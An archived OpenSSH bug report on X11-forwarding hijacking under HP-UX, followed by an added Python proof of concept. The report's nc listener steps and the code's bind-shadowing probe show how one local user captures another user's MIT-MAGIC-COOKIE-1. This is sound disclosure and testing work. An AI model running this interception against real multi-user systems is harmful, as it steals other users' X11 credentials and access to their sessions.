Mailing List Archive

[Bug 1464] New: "possible hijacking of X11-forwarded connections" bug has not been fixed completely
https://bugzilla.mindrot.org/show_bug.cgi?id=1464

Summary: "possible hijacking of X11-forwarded connections" bug
has not been fixed completely
Classification: Unclassified
Product: Portable OpenSSH
Version: 5.0p1
Platform: Other
OS/Version: HP-UX
Status: NEW
Severity: security
Priority: P5
Component: sshd
AssignedTo: bitbucket@mindrot.org
ReportedBy: sway2004009@hotmail.com


Hi OpenSSH team,

I am still able to reproduce this problem with the openssh50 code on
hpux.
It seems OpenSSH didn't fix this problem completely.

How to reproduce:

1. root at sshpa4# uname -a
   HP-UX sshpa4 B.11.23 U 9000/800 3267743753 unlimited-user license

2. sshd_config:
   X11Forwarding yes
   X11DisplayOffset 10
   X11UseLocalhost no
   // must not use "yes" to bind to localhost

3. /opt/ssh/sbin/sshd

4. log on to sshpa4 from another terminal as the normal user "sway" and
   start "nc":
   sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s sshpa4.chn.hp.com
   listening on [16.157.129.223] 6010 ...

5. log on to sshpa4 as another user, "leanne", with X11 forwarding:
   leanne at sshpa4# echo $DISPLAY
   16.157.129.223:10.0
   leanne at sshpa4# netstat -an|grep 6010
   tcp 0 0 16.157.129.223.6010 *.* LISTEN
   tcp 0 0 *.6010 *.* LISTEN
   tcp 0 0 *.6010 *.* LISTEN
   tcp 0 0 *.6010 *.* LISTEN

6. user sway2 starts any X program; it will end up being hijacked by user
   "sway":
   leanne at sshpa4# xclock

7. hijacked by user "sway":
   sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s sshpa4.chn.hp.com
   listening on [16.157.129.223] 6010 ...
   connect to [16.157.129.223] from sshpa4.chn.hp.com [16.157.129.223] 54765
   B
   MIT-MAGIC-COOKIE-1Öbs«¨¼ÓŠG‘‘›!ƒÂ


I found that this problem can only happen when "X11UseLocalhost no" is
set in the sshd_config.

I checked the code and found that there might be something wrong with the
"channel_set_reuseaddr(sock);" call, which is made in the function
x11_create_display_inet in file channels.c.

Can someone check this out for me? Thanks.

--
Configure bugmail: https://bugzilla.mindrot.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are watching the assignee of the bug.
_______________________________________________
openssh-bugs mailing list
openssh-bugs@mindrot.org
https://lists.mindrot.org/mailman/listinfo/openssh-bugs
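The two binds from the reproduction steps above (sshd's wildcard X11 listener with SO_REUSEADDR, and a second local user's `nc -l -p 6010 -s <addr>` on the same port) and the setup request that nc captured, recreated as an added example. This is editor-written Python, not code from the bug report or from OpenSSH: the port is whatever the kernel hands out, the attacker address 127.0.0.1 and the cookie value are placeholders chosen here, and the X11 connection-setup request is constructed from the protocol's fixed layout (byte-order byte, version, padded auth name, padded auth data). The probe reports what this platform does; BSD-derived stacks such as the HP-UX in the report permit the second bind when both sockets set SO_REUSEADDR, whereas Linux refuses it while the wildcard socket is listening, and no platform permits it when the listener lacks SO_REUSEADDR.

```python
"""Added example: socket-level probe for the X11 listener shadowing described
in the bug report, plus a parser for the captured X11 setup request.
Not part of the report or of OpenSSH; addresses, port and cookie are placeholders."""
import errno
import socket
import struct

# Constructed sample cookie (placeholder, not the one shown in the report).
SAMPLE_COOKIE = bytes.fromhex("00112233445566778899aabbccddeeff")
AUTH_NAME = b"MIT-MAGIC-COOKIE-1"


def _pad4(n):
    """X11 pads variable-length setup fields to a multiple of four bytes."""
    return (4 - n % 4) % 4


def build_x11_setup(cookie, order=b"B"):
    """Build an X11 connection-setup request as an X client sends it: byte-order
    byte ('B' = MSB first, 'l' = LSB first), one unused byte, major/minor
    protocol version, auth-name and auth-data lengths, two unused bytes, then
    the padded auth-protocol name and the padded auth data (the cookie)."""
    end = ">" if order == b"B" else "<"
    hdr = order + b"\0" + struct.pack(end + "HHHH", 11, 0, len(AUTH_NAME), len(cookie)) + b"\0\0"
    return (hdr + AUTH_NAME + b"\0" * _pad4(len(AUTH_NAME))
            + cookie + b"\0" * _pad4(len(cookie)))


def parse_x11_setup(data):
    """Parse the setup request the fake listener received: this is the 'B ...
    MIT-MAGIC-COOKIE-1 <bytes>' that nc printed in the report. Returns the
    auth protocol name and the raw auth data, i.e. the leaked cookie."""
    if len(data) < 12 or data[0:1] not in (b"B", b"l"):
        raise ValueError("not an X11 setup request")
    end = ">" if data[0:1] == b"B" else "<"
    major, minor, nlen, dlen = struct.unpack(end + "HHHH", data[2:10])
    off = 12                                   # header is 12 bytes
    name, off = data[off:off + nlen], off + nlen + _pad4(nlen)
    auth = data[off:off + dlen]
    if len(name) != nlen or len(auth) != dlen:
        raise ValueError("truncated setup request")
    return {"major": major, "minor": minor,
            "auth_name": name.decode("ascii"), "auth_data": auth}


def probe_wildcard_shadowing(listener_reuseaddr=True, attacker_addr="127.0.0.1"):
    """Recreate the two binds from the report on a free port and say whether a
    specific-address bind shadows the wildcard listener on this platform.

    Step A mimics sshd with X11UseLocalhost no: bind 0.0.0.0:<port> and listen,
    with SO_REUSEADDR when listener_reuseaddr is set (channel_set_reuseaddr).
    Step B mimics the other user's `nc -l -p <port> -s <addr>`: bind the same
    port on one specific local address, also with SO_REUSEADDR.
    If step B is permitted, connect to the specific address as a forwarded X
    client would and see which socket receives the setup request."""
    victim = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    attacker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    result = {"shadowed": False, "leaked_cookie": None}
    try:
        if listener_reuseaddr:
            victim.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        victim.bind(("0.0.0.0", 0))            # port 0: kernel picks a free port
        victim.listen(5)
        port = victim.getsockname()[1]
        result["port"] = port
        attacker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            attacker.bind((attacker_addr, port))
            attacker.listen(5)
        except OSError as e:
            if e.errno == errno.EADDRINUSE:    # kernel refused the colliding bind
                return result
            raise
        result["shadowed"] = True
        attacker.settimeout(2)
        client = socket.create_connection((attacker_addr, port), timeout=2)
        try:
            client.sendall(build_x11_setup(SAMPLE_COOKIE))
            conn, _ = attacker.accept()       # most-specific bind receives it
            with conn:
                conn.settimeout(2)
                result["leaked_cookie"] = parse_x11_setup(conn.recv(4096))["auth_data"]
        except socket.timeout:
            pass                               # connection went to the wildcard listener
        finally:
            client.close()
        return result
    finally:
        victim.close()
        attacker.close()


if __name__ == "__main__":
    print("listener without SO_REUSEADDR:", probe_wildcard_shadowing(listener_reuseaddr=False))
    print("listener with SO_REUSEADDR:   ", probe_wildcard_shadowing())
```

Run as a script on the platform under test; a `shadowed: True` result with a non-empty `leaked_cookie` is the condition the report shows with nc, and it only arises when the wildcard listener itself set SO_REUSEADDR.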